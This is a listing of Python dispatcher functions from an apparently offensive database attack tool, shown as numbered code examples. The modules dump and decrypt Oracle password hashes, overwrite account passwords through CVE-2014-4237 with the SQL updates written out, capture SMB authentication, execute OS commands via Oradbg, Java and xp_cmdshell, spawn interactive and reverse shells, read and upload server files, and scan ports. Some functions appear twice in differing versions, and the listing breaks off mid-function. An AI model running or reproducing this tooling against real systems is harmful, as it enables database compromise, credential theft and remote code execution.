		out.title("Try to get Oracle hashed passwords from history")
		outcome = passwords.__tryToGetHashedPasswordsfromHistory__()
		if outcome == True:
			out.goodNews("Here are Oracle hashed passwords:")
			passwords.printPasswords()
		else:
			out.badNews("Impossible to get hashed passwords from history: {0}".format(outcome))
Example #35
def runMssqlInfoModule(args):
	'''
	Run the MssqlInfo module.

	With 'get-max-info' set, reports the version obtained from the TDS
	response and then the data returned by the SQL Server Browser query.
	Returns EXIT_MISS_ARGUMENT when the option check fails.
	'''
	if checkOptionsGivenByTheUser(args,["get-max-info"],checkAccount=False) == False:
		return EXIT_MISS_ARGUMENT
	if args['get-max-info'] != True:
		return
	out = args['print']
	mssqlInfo = MssqlInfo(args)
	# The TDS query runs before its title is printed.
	tdsVersion = mssqlInfo.__getRemoteVersionThroughTDSResponse__()
	out.title("Try to get the remote database version thanks to the TDS protocol:")
	if 'Version' in tdsVersion and 'ProductName' in tdsVersion:
		out.goodNews("The SQL server version of {0}:{1}: {2} i.e. {3}".format(args['host'],args['port'], tdsVersion['Version'],tdsVersion['ProductName']))
	else:
		out.badNews("Impossible to get the remote database version thanks to the TDS protocol")
	out.title("Try to get information about the remote database thanks to SQL browser Server:")
	browserInfo = mssqlInfo.__getRemoteVersionThroughSQLServerBrowser__()
	# An empty dict is reported as the browser service not being enabled.
	if browserInfo == {}:
		out.badNews("SQL Server Browser is not enabled on the server {0}:{1}".format(args['host'], args['port']))
	else:
		out.goodNews("SQL Server Browser is enabled on the server {0}:{1}:\n{2}".format(args['host'], args['port'], mssqlInfo.returnPrintableStringFromDict(browserInfo)))
Example #36
def runTnsCmdModule(args):
	'''
	Run the TNS cmd module.

	Handles 'ping', 'version' and 'status' in that order, printing what the
	Tnscmd object returns for each. Returns EXIT_MISS_ARGUMENT when the
	option check fails.
	'''
	if checkOptionsGivenByTheUser(args,["version","status","ping"],checkSID=False,checkAccount=False) == False:
		return EXIT_MISS_ARGUMENT
	tnscmd = Tnscmd(args)
	out = args['print']
	server, port = args['server'], args['port']
	if args['ping'] == True:
		out.title("Searching ALIAS on the {0} server, port {1}".format(server, port))
		aliases = tnscmd.getAlias()
		out.goodNews("{0} ALIAS received: {1}. You should use this alias (more or less) as Oracle SID.".format(len(aliases), aliases))
	if args['version'] == True:
		out.title("Searching the version of the Oracle database server ({0}) listening on the port {1}".format(server, port))
		remoteVersion = tnscmd.getVersion()
		out.goodNews("The remote database version is: '{0}'".format(remoteVersion))
	if args['status'] == True:
		out.title("Searching the server status of the Oracle database server ({0}) listening on the port {1}".format(server, port))
		tnscmd.getInformation(cmd='status')
		# The reply is read back from the object rather than from the call's return value.
		out.goodNews("Data received by the database server: '{0}'".format(tnscmd.getRecvData()))
Example #37
File: SMB.py Project: zyayaa/odat
def runSMBModule(args):
	'''
	Run the SMB module.

	Handles 'test-module' and 'captureSMBAuthentication' (two values, shown
	in the title as a \\\\host\\share style path). Returns
	EXIT_MISS_ARGUMENT when the option check fails.
	'''
	if checkOptionsGivenByTheUser(args,["test-module",'captureSMBAuthentication']) == False:
		return EXIT_MISS_ARGUMENT
	smb = SMB(args)
	smb.connection(stopIfError=True)
	out = args['print']
	if args['test-module'] == True:
		out.title("Test if SMB authentication capture can be possible")
		smb.testAll()
	# Option 1: capture SMB authentication
	captureSpec = args['captureSMBAuthentication']
	if captureSpec is not None:
		first, second = captureSpec[0], captureSpec[1]
		out.title("Try to capture the SMB authentication (Connection to \\\\{0}\\{1} )".format(first, second))
		outcome = smb.captureSMBAuthentication(first, second)
		if isinstance(outcome, Exception):
			out.badNews("Impossible to capture the SMB authentication")
		else:
			out.goodNews("Check your SMB capture tool ...")
Example #38
def runUtlTcpModule(args):
    '''
    Run the UTL_TCP module.

    Handles 'test-module', 'send-packet' (three values, the third being the
    file that holds the packet) and 'scan-ports' (target, port
    specification), then closes the UtlTcp object. Returns
    EXIT_MISS_ARGUMENT when the option check fails.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "send-packet", "scan-ports"]) == False:
        return EXIT_MISS_ARGUMENT
    utlTcp = UtlTcp(args)
    utlTcp.connection(stopIfError=True)
    out = args['print']
    if args['test-module'] == True:
        out.title("Test if the UTL_TCP library can be used")
        utlTcp.testAll()
    # Option 2: send packet
    packetSpec = args['send-packet']
    if packetSpec is not None:
        out.title("Send the packet stored in the {0} file".format(packetSpec[2]))
        reply = utlTcp.sendPacket(packetSpec[0], packetSpec[1], filename=packetSpec[2])
        if isinstance(reply, Exception):
            out.badNews("Impossible to send the packet: {0}".format(reply))
        else:
            out.goodNews("Response from the server:\n{0}".format(reply))
    # Option 1: tcp Scan
    if args['scan-ports'] is not None:
        portSpec = args['scan-ports'][1]
        ports = []
        if "," in portSpec:
            ports = portSpec.split(',')
        elif '-' in portSpec:
            bounds = portSpec.split('-')
            # range() stops before the upper bound, so "A-B" yields A .. B-1.
            ports = [str(aPort) for aPort in range(int(bounds[0]), int(bounds[1]))]
        else:
            # NOTE(review): a bare numeric port lands here too, and execution
            # continues with an empty port list instead of returning.
            logging.error("Syntax for ports given not recognized")
        target = args['scan-ports'][0]
        out.title("Scan ports ({0}) of {1} ".format(portSpec, target))
        scanResults = utlTcp.scanTcpPorts(httpObject=utlTcp, ip=target, ports=ports)
        utlTcp.printScanPortResults(scanResults)
    utlTcp.close()
Example #39
File: Oradbg.py Project: 6zq/odat
def runOradbgModule(args):
	'''
	Run the Oradbg module.

	Handles 'test-module' and 'exec' (passed to execOSCommand), then closes
	the Oradbg object. Returns EXIT_MISS_ARGUMENT when the option check
	fails.
	'''
	if checkOptionsGivenByTheUser(args,["test-module","exec"]) == False:
		return EXIT_MISS_ARGUMENT
	oradbg = Oradbg(args)
	oradbg.connection(stopIfError=True)
	out = args['print']
	if args['test-module'] == True:
		out.title("Test if the Oradbg can be used")
		oradbg.testAll()
	# Option 1: exec
	command = args['exec']
	if command is not None:
		out.title("Execute the `{0}` on the {1} server".format(command, args['server']))
		outcome = oradbg.execOSCommand(command)
		# Anything other than True is shown as the failure reason.
		if outcome == True:
			out.goodNews("The `{0}` command was executed on the {1} server (probably)".format(command, args['server']))
		else:
			out.badNews("The `{0}` command was not executed on the {1} server: {2}".format(command, args['server'], str(outcome)))
	oradbg.close()
Example #40
def runCVEXXXYYYModule(args):
    '''
    Dispatch the CVE_XXXX_YYYY module options found in args.

    "set-pwd-2014-4237" carries (user, new password). Both Oracle hash
    formats are computed locally, two UPDATE statements against sys.user$
    are built as text, and both are handed to exploit_CVE_2014_4237().

    Review notes:
    - The user name and the hashes are interpolated into the SQL text with
      str.format(); nothing is quoted or escaped here.
    - The hashes are written to the log at INFO level and the new cleartext
      password is echoed in the success message, so logs and console
      output of this function contain credential material.
    - Both result messages state that a database restart is necessary.
    '''
    optionName = 'set-pwd-2014-4237'
    if checkOptionsGivenByTheUser(args, ["test-module", optionName],
                                  checkAccount=False) == False:
        return EXIT_MISS_ARGUMENT
    cve = CVE_XXXX_YYYY(args)
    status = cve.connection(stopIfError=True)
    if args['test-module'] == True:
        cve.testAll()
    if args[optionName] != None:
        targetUser = args[optionName][0]
        newPassword = args[optionName][1]
        hash11g = oracle11.encrypt(newPassword)
        hash10g = oracle10.encrypt(newPassword, user=targetUser)
        logging.info("hash11g('{2}')={0} & hash10g('{2}')={1}".format(
            hash11g, hash10g, targetUser))
        # NOTE(review): both literals set password='******' and never
        # reference {1} (hash10g); this looks like masking applied to the
        # listing - confirm against the project source.
        sqlValues = (targetUser, hash10g, hash11g)
        REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237 = "update (with tmp as (select * from sys.user$) select * from tmp) set password='******', SPARE4='{2}' where name='{0}'".format(*sqlValues)
        REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237 = "update sys.user$ set password='******', SPARE4='{2}' where name='{0}'".format(*sqlValues)
        banner = "Modify password of '{0}' by these hashs '{1}' & '{2}' using CVE-2014-4237".format(
            targetUser, hash10g, hash11g)
        args['print'].title(banner)
        status = cve.exploit_CVE_2014_4237(
            updateRequestNormal=REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237,
            updateRequestWithView=REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237)
        # Three-valued result: True, False and None each get their own
        # message; any other value is silently ignored.
        if status == True:
            cve.args['print'].goodNews(
                "The password of '{0}' has been replaced by '{1}' by exploiting CVE-2014-4237. DB restart necessary!"
                .format(targetUser, newPassword))
        elif status == False:
            cve.args['print'].badNews(
                "The password of '{0}' has NOT been replaced".format(targetUser))
        elif status == None:
            cve.args['print'].goodNews(
                "The password of '{0}' has been replaced. This CVE has not be used to do that (if it impacts this database). DB restart necessary!"
                .format(targetUser))
Example #41
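def runDbmsLob (args):
    '''
    Dispatch the DbmsLob module options found in args.

    "getFile" carries (remote path, remote file name, local file). The
    result of getFile() is reported as: an Exception (error), False (file
    does not exist), '' (file is empty) or the file content.

    Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser() rejects the
    option set, otherwise None.

    NOTE(review): no close call is made on the connection in this function;
    confirm it is released elsewhere.
    '''
    status = True
    if checkOptionsGivenByTheUser(args,["test-module","getFile"]) == False : return EXIT_MISS_ARGUMENT
    dbmsLob = DbmsLob(args)
    status = dbmsLob.connection(stopIfError=True)
    if args['test-module'] == True :
        args['print'].title("Test if the DbmsLob module can be used")
        status = dbmsLob.testAll()
    #Option 1: getFile
    if args['getFile'] != None:
        remotePath, remoteName, localFile = args['getFile'][0], args['getFile'][1], args['getFile'][2]
        args['print'].title("Read the {0} file stored in the {1} path".format(remoteName, remotePath))
        data = dbmsLob.getFile (remotePath=remotePath, remoteNameFile=remoteName, localFile=localFile)
        if isinstance(data,Exception):
            args['print'].badNews("There is an error: {0}".format(data))
        elif data == False :
            args['print'].badNews("The {0} file in {1} doesn't exist".format(remoteName, remotePath))
        elif data == '' :
            # Fixed: the message used to format the whole getFile argument
            # list instead of the remote file name.
            args['print'].badNews("The {0} file is empty".format(remoteName))
        else :
            # The full file content is echoed to the console as well as
            # being copied to the local file named in the message.
            args['print'].goodNews("Data stored in the {0} file sored in {1} (copied in {2} locally):\n{3}".format(remoteName, remotePath, localFile, data))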
Example #42
File: UtlFile.py Project: 6zq/odat
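def runUtlFileModule(args):
    '''
    Dispatch the UtlFile module options found in args.

    - "getFile": (remote directory, remote file name, local file). Reads
      the remote file, prints it and writes it to the local file.
    - "putFile": (remote directory, remote file name, local file). Uploads
      the local file.
    - "removeFile": (remote directory, remote file name). Deletes the
      remote file.

    Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser() rejects the
    option set, otherwise None.

    NOTE(review): no close call is made on the connection in this function;
    confirm it is released elsewhere.
    '''
    status = True
    if checkOptionsGivenByTheUser(args,["test-module","getFile",'putFile','removeFile']) == False : return EXIT_MISS_ARGUMENT
    utlFile = UtlFile(args)
    status = utlFile.connection(stopIfError=True)
    if args['test-module'] == True :
        args['print'].title("Test if the UTL_FILE library can be used")
        status = utlFile.testAll()
    #Option 1: read file
    if args['getFile'] !=None :
        remoteDir, remoteName, localFile = args['getFile'][0], args['getFile'][1], args['getFile'][2]
        args['print'].title("Read the {0} file stored in {1} on the {2} server".format(remoteName, remoteDir, args['server']))
        # The length was never used by this function; the call is kept so
        # the sequence of remote calls stays as it was.
        utlFile.getLength(remoteDir, remoteName)
        data = utlFile.getFile(remoteDir, remoteName)
        if isinstance(data,Exception):
            # Fixed: format the file name, not the whole getFile argument list.
            args['print'].badNews("Impossible to read the {0} file: {1}".format(remoteName, data))
        elif data == False :
            args['print'].badNews("The {0} file in {1} doesn't exist".format(remoteName, remoteDir))
        elif data == '' :
            # Fixed: same wrong format argument as above.
            args['print'].badNews("The {0} file is empty".format(remoteName))
        else :
            # The content is echoed to the console and then written locally.
            args['print'].goodNews("Data stored in the {0} file sored in {1} (copied in {2} locally):\n{3}".format(remoteName, remoteDir, localFile, data))
            utlFile.writeFile(localFile, data)
    #Option 2: put file
    if args['putFile'] !=None :
        args['print'].title("Put the {0} local file in the {1} folder like {2} on the {3} server".format(args['putFile'][2],args['putFile'][0],args['putFile'][1],args['server']))
        status = utlFile.putFile(args['putFile'][0], args['putFile'][1], localFile=args['putFile'][2])
        if isinstance(status,Exception):
            args['print'].badNews("Impossible to put the {0} file: {1}".format(args['putFile'][2],status))
        else :
            # Any non-Exception return value is reported as success.
            args['print'].goodNews("The {0} file was created on the {1} directory on the {2} server like the {3} file".format(args['putFile'][2], args['putFile'][0], args['server'],args['putFile'][1]))
    #Option 3: remove file
    if args['removeFile'] !=None :
        args['print'].title("Remove the {0} file stored in the {1} folder on the {2} server".format(args['removeFile'][1],args['removeFile'][0],args['server']))
        status = utlFile.deleteFile(args['removeFile'][0], args['removeFile'][1])
        if isinstance(status,Exception):
            args['print'].badNews("Impossible to remove the {0} file: {1}".format(args['removeFile'][1],status ))
        else :
            # Any non-Exception return value is reported as success.
            args['print'].goodNews("The {0} file was deleted on the {1} directory on the {2} server".format(args['removeFile'][1], args['removeFile'][0], args['server']))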
Example #43
File: UtlHttp.py Project: 6zq/odat
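def runUtlHttpModule(args):
    '''
    Dispatch the UTL_HTTP module options found in args.

    - "send": three values passed positionally to sendRequest(); the third
      one is the file holding the HTTP request.
    - "scan-ports": (ip, port specification). The specification is a
      comma-separated list, a "start-end" range or a single number.

    Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser() rejects the
    option set, -1 when the port specification is not usable, otherwise
    None.

    The connection is now closed on every path once it has been opened;
    previously the two "return -1" paths left it open. A non-numeric range
    bound is reported like an empty range instead of raising ValueError.
    '''
    status = True
    if checkOptionsGivenByTheUser(args,["test-module","scan-ports","send"]) == False : return EXIT_MISS_ARGUMENT
    utlHttp = UtlHttp(args)
    status = utlHttp.connection(stopIfError=True)
    try:
        utlHttp.setTimeout(5)
        if args['test-module'] == True :
            args['print'].title("Test if the UTL_HTTP library can be used")
            status = utlHttp.testAll()
        #Option 1: sendRequest
        if args['send'] != None:
            args['print'].title("Send the HTTP request stored in the {0} file".format(args['send'][2]))
            data = utlHttp.sendRequest(args['send'][0],args['send'][1],args['send'][2])
            if isinstance(data,Exception):
                args['print'].badNews("Impossible to send the request: {0}".format(data))
            else :
                args['print'].goodNews("Response from the server:\n{0}".format(data))
        #Option 2: scan-ports
        if args['scan-ports'] != None:
            targetIp, portsSpec = args['scan-ports'][0], args['scan-ports'][1]
            ports = []
            if "," in portsSpec:
                # List items are passed on as given; they are not checked
                # for being numeric here.
                ports = portsSpec.split(',')
            elif '-' in portsSpec:
                startEnd = portsSpec.split('-')
                try:
                    # range() excludes its end value, so the upper bound of
                    # "start-end" is not part of the list.
                    ports = [str(aPort) for aPort in range(int(startEnd[0]), int(startEnd[1]))]
                except ValueError:
                    ports = []
                if ports == []:
                    logging.critical("The second parameter ('{0}') is not a valid: cancelation...".format(portsSpec))
                    return -1
            elif portsSpec.isdigit() == True:
                ports = [portsSpec]
            else:
                logging.critical("The second parameter ('{0}') is not a valid port: cancelation...".format(portsSpec))
                return -1
            args['print'].title("Scan ports ({0}) of {1} ".format(portsSpec, targetIp))
            resultats = utlHttp.scanTcpPorts(httpObject=utlHttp,ip=targetIp,ports=ports)
            utlHttp.printScanPortResults(resultats)
    finally:
        utlHttp.close()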
Example #44
def runCVEXXXYYYModule(args):
    '''
    Dispatch the CVE_XXXX_YYYY module options found in args.

    With "set-pwd-2014-4237" = (user, new password) the function hashes the
    password in both Oracle formats, formats two UPDATE statements on
    sys.user$ and passes them to exploit_CVE_2014_4237().

    Review notes: the statements are assembled with str.format() from the
    user name and the hashes, without quoting or escaping; the hashes go to
    the log at INFO level and the cleartext password appears in the success
    message.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "set-pwd-2014-4237"], checkAccount=False) == False:
        return EXIT_MISS_ARGUMENT
    cve = CVE_XXXX_YYYY(args)
    status = cve.connection(stopIfError=True)
    if args['test-module'] == True:
        cve.testAll()
    if args['set-pwd-2014-4237'] == None:
        return
    account, clearPassword = args['set-pwd-2014-4237'][0], args['set-pwd-2014-4237'][1]
    hash11g = oracle11.encrypt(clearPassword)
    hash10g = oracle10.encrypt(clearPassword, user=account)
    logging.info("hash11g('{2}')={0} & hash10g('{2}')={1}".format(hash11g, hash10g, account))
    # NOTE(review): the statements below contain password='******' and do
    # not use {1} (hash10g); presumably masked in this listing - confirm.
    REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237 = "update (with tmp as (select * from sys.user$) select * from tmp) set password='******', SPARE4='{2}' where name='{0}'".format(account, hash10g, hash11g)
    REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237 = "update sys.user$ set password='******', SPARE4='{2}' where name='{0}'".format(account, hash10g, hash11g)
    args['print'].title("Modify password of '{0}' by these hashs '{1}' & '{2}' using CVE-2014-4237".format(account, hash10g, hash11g))
    status = cve.exploit_CVE_2014_4237(
        updateRequestNormal=REQ_ALTER_AUDIT_ACTIONS_FOR_CVE_2014_4237,
        updateRequestWithView=REQ_ALTER_AUDIT_ACTIONS_WITH_VIEW_FOR_CVE_2014_4237,
    )
    reporter = cve.args['print']
    # True, False and None are reported; any other status prints nothing.
    if status == True:
        reporter.goodNews("The password of '{0}' has been replaced by '{1}' by exploiting CVE-2014-4237. DB restart necessary!".format(account, clearPassword))
    elif status == False:
        reporter.badNews("The password of '{0}' has NOT been replaced".format(account))
    elif status == None:
        reporter.goodNews("The password of '{0}' has been replaced. This CVE has not be used to do that (if it impacts this database). DB restart necessary!".format(account))
Example #45
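def runCVE20123137Module(args):
    '''
    Dispatch the CVE_2012_3137 module options found in args.

    - "get-all-passwords": needs an effective uid of 0 (the message says
      the module sniffs authentications). Collected keys are printed and
      written to "sessions-<server>-<port>-<sid><CHALLENGE_EXT_FILE>" in
      the current working directory.
    - "decrypt-sessions": two values passed to decryptKeys(); recovered
      (account, password) pairs are printed.

    Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser() rejects the
    option set, otherwise None.

    The sessions file is now written through a context manager so the
    handle is released even when the write fails.
    '''
    if checkOptionsGivenByTheUser(args,["test-module","get-all-passwords","decrypt-sessions"],checkAccount=False) == False : return EXIT_MISS_ARGUMENT
    cve = CVE_2012_3137 (args,  accountsFile=args['user-list'], timeSleep=args['timeSleep'])
    if args['test-module'] == True :
        cve.testAll()
    #Option 1: get all passwords
    if args['get-all-passwords'] != None:
        # Bare Python 2 print statement (emits an empty line under Python 2).
        print
        if geteuid() != 0:
            args['print'].badNews("Sorry, you need to run this as root because I need to sniff authentications to the database")
        else:
            args['print'].title("Getting remote passwords on the {0} server, port {1}".format(args['server'],args['port']))
            cve.getPasswords()
            keys = cve.getKeys()
            if keys != []:
                args['print'].goodNews("Here are keys:\n\n{0}\n\nIf for some users keys are empty, there was an error during capture or this Oracle user does not exist on the database".format('\n'.join(keys)))
                filename = "sessions-{0}-{1}-{2}{3}".format(args['server'],args['port'],args['sid'],CHALLENGE_EXT_FILE)
                # The file holds captured authentication material and is
                # created with the process default permissions.
                with open(filename,"w") as sessionsFile:
                    sessionsFile.write('\n'.join(keys))
                args['print'].goodNews("Sessions strored in the {0} file.".format(filename))
            else :
                args['print'].badNews("Impossible to exploit this vulnreability")
    #Option 2: decrypt sessions
    if args['decrypt-sessions'] != None:
        args['print'].title("Decrypt sessions stored in {0} via {1}".format(args['decrypt-sessions'][0],args['decrypt-sessions'][1]))
        passwds = cve.decryptKeys(args['decrypt-sessions'][0], args['decrypt-sessions'][1])
        if passwds != []:
            # One "account:password" line per entry, each newline-terminated.
            passwordsStr = "".join('{0}:{1}\n'.format(e[0],e[1]) for e in passwds)
            args['print'].goodNews("Accounts found:\n{0}".format(passwordsStr))
        else:
            args['print'].badNews("No password has been found")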
Example #46
def runXpCmdShellModule(args):
    '''
    Dispatch the XpCmdShell module options found in args.

    Options are handled in this order: "test-module", "enable-xpcmdshell",
    "shell", "disable-xpcmdshell". The disable step is skipped when the
    enable step of the same run did not return True.

    Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser() rejects the
    option set; otherwise returns None after closing the connection.
    '''
    acceptedOptions = ["test-module", "shell", "enable-xpcmdshell", "disable-xpcmdshell"]
    if checkOptionsGivenByTheUser(args, acceptedOptions, checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT
    # Stays True unless the enable step runs and returns something else.
    noErrorWithEnableXpcmdshell = True
    xpcmdshell = Xpcmdshell(args)
    xpcmdshell.connect()
    if args["test-module"] == True:
        xpcmdshell.testAll()
    if args["enable-xpcmdshell"] == True:
        args['print'].title("Re-enable Xpcmdshell")
        noErrorWithEnableXpcmdshell = xpcmdshell.enableXpcmdshell()
        if noErrorWithEnableXpcmdshell == True:
            args['print'].goodNews("Xpcmdshell is re-enabled")
        else:
            args['print'].badNews("Xpcmdshell is NOT re-enabled")
    if args["shell"] == True:
        args['print'].title("Trying to get a shell thanks to xpcmdshell")
        shellStatus = xpcmdshell.getInteractiveShell()
        if shellStatus == True:
            args['print'].goodNews("Good Bye :)")
        else:
            args['print'].badNews("Impossible to get a shell on the database")
    if args["disable-xpcmdshell"] == True and noErrorWithEnableXpcmdshell == True:
        args['print'].title("Disable Xpcmdshell")
        disableStatus = xpcmdshell.disableXpcmdshell()
        if disableStatus == True:
            args['print'].goodNews("Xpcmdshell is disabled")
        else:
            args['print'].badNews(
                "Xpcmdshell is NOT disabled: {0}".format(disableStatus))
    xpcmdshell.closeConnection()
Example #47
File: Java.py Project: 6zq/odat
def runjavaModule(args):
    '''
    Dispatch the JAVA module options found in args.

    Handles "test-module", "exec" (one OS command), "shell" (interactive
    pseudo shell) and "reverse-shell" (local ip, local port). Returns
    EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser() rejects the option
    set; otherwise returns None after closing the connection.

    NOTE(review): "exec" is handled below but is not in the list given to
    checkOptionsGivenByTheUser() - confirm whether that is intended.
    NOTE(review): the test title names the DBMSScheduler library although
    this is the Java module - looks like a copy/paste leftover.
    '''
    if checkOptionsGivenByTheUser(args, ["test-module", "shell", "reverse-shell"]) == False:
        return EXIT_MISS_ARGUMENT
    java = Java(args)
    status = java.connection(stopIfError=True)
    if args['test-module'] == True:
        args['print'].title("Test if the DBMSScheduler library can be used")
        status = java.testAll()
    # Option 1: exec
    osCommand = args['exec']
    if osCommand != None:
        args['print'].title("Execute the `{0}` on the {1} server".format(osCommand, args['server']))
        # The returned status is stored but not reported by this function.
        status = java.execOSCommand(
            cmd=osCommand,
            printResponse=True,
            needCreateClassAndFunction=True,
            needDeleteClassAndFunction=True,
        )
    # Option 2: shell
    if args['shell'] == True:
        args['print'].title("Try to give you a pseudo shell to the {0} server".format(args['server']))
        java.getInteractiveShell()
    # Option 3: reverse shell
    reverseShellTarget = args['reverse-shell']
    if reverseShellTarget != None:
        args['print'].title("Try to give you a nc reverse shell from the {0} server".format(args['server']))
        java.giveReverseShell(localip=reverseShellTarget[0], localport=reverseShellTarget[1])
    java.close()
Example #48
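def runPasswordsModule(args):
    '''
    Dispatch the Passwords module options found in args.

    - "get-passwords": fetches hashed passwords and prints them in three
      layouts (plain, oclHashcat, John the Ripper).
    - "get-passwords-not-locked": same, with the locked user names passed
      to __tryToGetHashedPasswords__() as a blacklist.
    - "get-passwords-from-history": fetches hashes from history and prints
      them in the plain layout only.

    When args has no 'info' entry, an Info object is created, loaded from
    the remote database and stored in args['info'].

    Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser() rejects the
    option set, otherwise None.

    The membership test uses the "in" operator instead of dict.has_key(),
    which only exists on Python 2 dictionaries.

    NOTE(review): every success path prints password hashes to the console;
    no close call is made on the connection in this function.
    '''
    status = True
    if checkOptionsGivenByTheUser(args, [
            "test-module", "get-passwords", "get-passwords-from-history",
            "get-passwords-not-locked"
    ]) == False:
        return EXIT_MISS_ARGUMENT
    passwords = Passwords(args)
    status = passwords.connection(stopIfError=True)
    # Result discarded here; the call is repeated below where the list is
    # needed. Kept because the helper may cache state - TODO confirm.
    passwords.__getLockedUsernames__()
    if 'info' not in args:
        info = Info(args)
        info.loadInformationRemoteDatabase()
        args['info'] = info
    if args['test-module'] == True:
        args['print'].title("Test if hashed passwords can be got")
        status = passwords.testAll()
    if args['get-passwords'] == True:
        args['print'].title("Try to get Oracle hashed passwords")
        status = passwords.__tryToGetHashedPasswords__()
        if status == True:
            args['print'].goodNews(
                "Here are Oracle hashed passwords (some accounts can be locked):"
            )
            passwords.printPasswords()
            args['print'].goodNews(
                "Here are 10g Oracle hashed passwords for oclHashcat (some accounts can be locked):"
            )
            passwords.printPasswordsOclHashcat()
            args['print'].goodNews(
                "Here are 10g Oracle hashed passwords for John the Ripper (some accounts can be locked):"
            )
            passwords.printPasswordsJohn()
        else:
            # Any non-True status is formatted into the failure message.
            args['print'].badNews(
                "Impossible to get hashed passwords: {0}".format(status))
    if args['get-passwords-not-locked'] == True:
        args['print'].title(
            "Try to get Oracle hashed passwords when the account is not locked"
        )
        blacklistOfUsernames = passwords.__getLockedUsernames__()
        status = passwords.__tryToGetHashedPasswords__(blacklistOfUsernames)
        if status == True:
            args['print'].goodNews(
                "Here are Oracle hashed passwords (all accounts are opened, not locked):"
            )
            passwords.printPasswords()
            args['print'].goodNews(
                "Here are 10g Oracle hashed passwords for oclHashcat (all accounts are opened, not locked):"
            )
            passwords.printPasswordsOclHashcat()
            args['print'].goodNews(
                "Here are 10g Oracle hashed passwords for John the Ripper (all accounts are opened, not locked):"
            )
            passwords.printPasswordsJohn()
        else:
            args['print'].badNews(
                "Impossible to get hashed passwords: {0}".format(status))
    if args['get-passwords-from-history'] == True:
        args['print'].title("Try to get Oracle hashed passwords from history")
        status = passwords.__tryToGetHashedPasswordsfromHistory__()
        if status == True:
            args['print'].goodNews("Here are Oracle hashed passwords:")
            passwords.printPasswords()
        else:
            args['print'].badNews(
                "Impossible to get hashed passwords from history: {0}".format(
                    status))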
Example #49
def runSMBAuthenticationCaptureModule(args):
    '''
    Dispatch the SMBAuthenticationCapture module options found in args.

    The first capture option that is not None (in the order "capture",
    "xp-dirtree-capture", "xp-fileexist-capture",
    "xp-getfiledetails-capture") supplies the address given to
    SMBAuthenticationCapture and decides which single method is run; with
    none set, "127.0.0.1" is used and no capture method is called.

    A True status is reported through unknownNews(): the messages say the
    authentication can "perhaps" be captured and refer the reader to the
    separate SMB capture tool.

    Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser() rejects the
    option set; otherwise returns None after closing the connection.

    NOTE(review): "test-module" is read below but is not in the list given
    to checkOptionsGivenByTheUser() - confirm whether that is intended.
    '''
    # option -> (title, method name, message on True, message otherwise)
    capturePlans = {
        "capture": (
            "Try to capture a SMB authentication with the xp_dirtree, xp_fileexist or xp_getfiledetails method",
            "tryToCaptureASmbAuthentication",
            "You can perhaps capture a SMB authentication with these methods. Check your SMB capture tool !",
            "You can't capture a SMB authentication with these methods",
        ),
        "xp-dirtree-capture": (
            "Try to capture a SMB authentication with the xp_dirtree method only",
            "captureSMBAuthenticationViaXpDirtree",
            "You can perhaps capture a SMB authentication with the xp_dirtree method. Check your SMB capture tool !",
            "You can't capture a SMB authentication with the xp_dirtree method",
        ),
        "xp-fileexist-capture": (
            "Try to capture a SMB authentication with the xp_fileexist method only",
            "captureSMBAuthenticationViaXpFileexist",
            "You can perhaps capture a SMB authentication with the xp_fileexist method. Check your SMB capture tool !",
            "You can't capture a SMB authentication with the xp_fileexist method",
        ),
        "xp-getfiledetails-capture": (
            "Try to capture a SMB authentication with the xp_getfiledetails method only",
            "captureSMBAuthenticationViaXpGetFileDetails",
            "You can perhaps capture a SMB authentication with the xp_getfiledetails method. Check your SMB capture tool !",
            "You can't capture a SMB authentication with the xp_getfiledetails method",
        ),
    }
    optionOrder = [
        "capture", "xp-dirtree-capture", "xp-fileexist-capture",
        "xp-getfiledetails-capture"
    ]
    if checkOptionsGivenByTheUser(args, list(optionOrder),
                                  checkAccount=True) == False:
        return EXIT_MISS_ARGUMENT
    # First option that was given wins, both for the address and the method.
    selectedOption = None
    for optionName in optionOrder:
        if args[optionName] != None:
            selectedOption = optionName
            break
    if selectedOption is None:
        listenerAddress = "127.0.0.1"
    else:
        listenerAddress = args[selectedOption][0]
    smbAuthenticationCapture = SMBAuthenticationCapture(
        args, listenerAddress, args['share-name'][0])
    smbAuthenticationCapture.connect()
    if args["test-module"] == True:
        smbAuthenticationCapture.testAll()
    if selectedOption is not None:
        title, methodName, maybeText, failureText = capturePlans[selectedOption]
        args['print'].title(title)
        status = getattr(smbAuthenticationCapture, methodName)()
        if status == True:
            args['print'].unknownNews(maybeText)
        else:
            args['print'].badNews(failureText)
    smbAuthenticationCapture.closeConnection()
Example #50
def runPrivilegeEscalationModule(args):
    '''
    Dispatch the PrivilegeEscalation module options found in args.

    Options are processed in a fixed order: "test-module", "get-privs",
    "get-detailed-privs", "revoke-dba-role", the "dba-with-*" and
    "alter-pwd-with-create-any-procedure" options, then the "exec-with-*"
    options, each of which passes its first value as privRequest.

    Returns EXIT_MISS_ARGUMENT when checkOptionsGivenByTheUser() rejects the
    option set, otherwise None.

    NOTE(review): the new password is echoed in the title and in the success
    message of "alter-pwd-with-create-any-procedure"; no close call is made
    on the connection in this function.
    '''
    acceptedOptions = [
        "test-module",
        "revoke-dba-role",
        "dba-with-execute-any-procedure",
        "alter-pwd-with-create-any-procedure",
        "dba-with-create-any-trigger",
        "dba-with-analyze-any",
        "dba-with-create-any-index",
        "exec-with-analyze-any",
        "exec-with-create-any-index",
        "exec-with-create-any-trigger",
        "exec-with-create-any-procedure",
        "exec-with-execute-any-procedure",
        "get-privs",
        "get-detailed-privs",
    ]
    if checkOptionsGivenByTheUser(args, acceptedOptions) == False:
